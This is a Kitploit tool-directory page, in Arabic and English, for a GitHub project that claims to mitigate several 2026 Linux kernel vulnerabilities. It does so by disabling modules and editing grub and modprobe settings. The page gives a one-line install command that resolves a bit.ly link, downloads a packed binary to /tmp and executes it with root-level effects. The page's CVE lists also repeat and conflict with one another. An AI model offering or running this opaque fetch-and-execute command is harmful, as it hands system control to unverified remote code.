Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve_2026_frag_family_fix — CVE-2026-46300 / CVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 إصلاح عاجل لـ golang | Kitploit
أدوات/GitHubGitHub/first-john/cve_2026_frag_family_fix
أمن البنية التحتية السحابيةماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالبرمجة النصية والأتمتةتدقيق التكوينأمن السحابةDevSecOps
GitHub

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
first-john/cve_2026_frag_family_fix

cve_2026_frag_family_fix

CVE-2026-46300 / CVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 إصلاح عاجل لـ golang

عرض المستودعالموقع الإلكتروني
115منذ 2 أشهرلم تتم المراجعة بعد
مشاركة

أداة تخفيف ثغرات عائلة frag / Mitigation tool for frag family vulnerability

  • Copy Fail (2026)
  • Dirty Frag (2026)
  • Fragnesia (2026)
  • DirtyClone (2026)
  • PEdit-CoW (2026)

تشغيل الإصلاح على أي لينكس / Run any Linux hotfix

b="/tmp/cve_2026_frag_family_fix"; wget -qO $b $(wget -qO- https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4) && chmod +x $b && $b

أو

b="/tmp/cve_2026_frag_family_fix"; curl -fsSL "$(curl -fsSL https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4)" -o $b && chmod +x $b && $b

CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331

الوصف

  • يتحقق من الوحدات المفعلة المتعلقة بثغرات CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331
  • يعرض تحديث النواة إذا كان متاحًا
  • يعطل esp4, esp6, rxrpc, act_pedit في حالة عدم توفر التحديث
  • يمنع تحميل الوحدات عبر modprobe
  • يضيف module_blacklist إلى grub
  • ينظف الإصلاح المؤقت تلقائيًا بعد تحديث النواة
  • للأنظمة المبنية على RHEL (AlmaLinux, Rocky, Oracle, Fedora) يعطل Boot Loader Specification (GRUB_ENABLE_BLSCFG=false)، ويضبط GRUB_DEFAULT=0، وينشئ خطاف تثبيت النواة (/etc/kernel/install.d/99-grub-update.install) يعيد توليد إعدادات grub بعد تحديث النواة لضمان تحميل أحدث نواة عند الإقلاع التالي.
  • للإصدارات الثانوية، يعرض وينفذ التحديث إلى أحدث إصدار ثانوي يتوفر له تحديث نواة.

Description

  • checks for CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331 vulnerability enabled modules
  • offers kernel update if available
  • disables esp4, esp6, rxrpc, act_pedit if not
  • blocks module loading via modprobe
  • adds module_blacklist to grub
  • automatically cleans up hotfix after kernel update
  • for RHEL-based systems (AlmaLinux, Rocky, Oracle, Fedora), disables Boot Loader Specification (GRUB_ENABLE_BLSCFG=false) and sets GRUB_DEFAULT=0, then creates a kernel install hook (/etc/kernel/install.d/99-grub-update.install) that regenerates grub config after kernel updates to ensure the most recent kernel loads on next boot
  • for minor releases, it offers and performs an update to the latest minor version that has a kernel update available.

CVE-2026-31431 / تخفيف Copy Fail (algif_aead)

الوصف

تفحص الأداة ثغرة CVE-2026-31431 (شرط مسبق) وتطبق التخفيف في حال وجود صلاحيات الجذر:

  • تحدد التركيبات المحمية من نظام التشغيل (بما في ذلك WSL) وإصدارات النواة
  • تعرض تحديث النواة مع الإصلاح إن توفر
  • تعطل algif_aead في حالة عدم توفر التحديث
  • تمنع تحميل الوحدة عبر modprobe
  • تضيف initcall_blacklist=algif_aead_init
  • تقيد AF_ALG عبر systemd

Description

This tool checks for CVE-2026-31431 (pre condition) and applies mitigation (requires root):

  • identifies protected combinations of OS (including WSL) and kernel versions
  • offers a kernel update with a fix if available
  • disables algif_aead if not
  • blocks module loading via modprobe
  • adds initcall_blacklist=algif_aead_init
  • restricts AF_ALG via systemd

بناء لينكس / build

docker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_frag_family_fix cve_2026_frag_family_fix.go && upx --best --ultra-brute cve_2026_frag_family_fix"

تحديث النواة (ليس إصلاحًا مؤقتًا) متاح لأنظمة / Kernel update (not hotfix) is exist for

OSCopy Fail
(CVE-2026-31431)
Dirty Frag
(CVE-2026-43500/43284)
Fragnesia
(CVE-2026-46300)
PEdit-CoW
(CVE-2026-46331)
Debian 10 (buster)❌❌❌❌
Debian 11 (bullseye)✅✅✅✅
Debian 12 (bookworm)✅✅✅✅
Debian 13 (trixie)✅✅✅✅
Ubuntu 18.04 (bionic)❌❌❌❌
Ubuntu 20.04 (focal)❌❌❌❌
Ubuntu 22.04 (jammy)✅❌❌❌
Ubuntu 24.04 (noble)✅✅✅❌
Ubuntu 25.04 (plucky)❌❌❌❌
Ubuntu 26.04 (resolute)✅✅✅✅
CentOS Stream 8❌❌❌❌
CentOS Stream 9✅✅✅✅
CentOS Stream 10✅✅✅✅
AlmaLinux 8✅✅✅✅
AlmaLinux 9✅✅✅✅
AlmaLinux 10✅✅✅✅
Rocky Linux 8✅✅✅✅
Rocky Linux 9✅✅✅✅
Rocky Linux 10✅✅✅✅
Fedora 40❌❌❌❌
Fedora 41❌❌❌❌
Fedora 42✅✅✅✅
Fedora 43✅✅✅✅
Fedora 44✅✅✅✅
Oracle Linux 8✅✅✅✅
Oracle Linux 9✅✅✅✅
Oracle Linux 10✅✅✅✅

أوامر تحديث النواة / Kernel update commands

  • Debian apt update && apt install linux-image-amd64 linux-headers-amd64 -y
  • Ubuntu apt update && apt install linux-image-generic linux-headers-generic -y
  • CentOS dnf clean metadata && dnf upgrade 'kernel*' -y
  • AlmaLinux dnf clean metadata && dnf upgrade 'kernel*' -y
  • RockyLinux dnf clean metadata && dnf upgrade 'kernel*' -y
  • Fedora dnf clean metadata && dnf upgrade 'kernel*' -y
  • OracleLinux dnf clean metadata && dnf upgrade 'kernel*' -y
تنزيل الأداة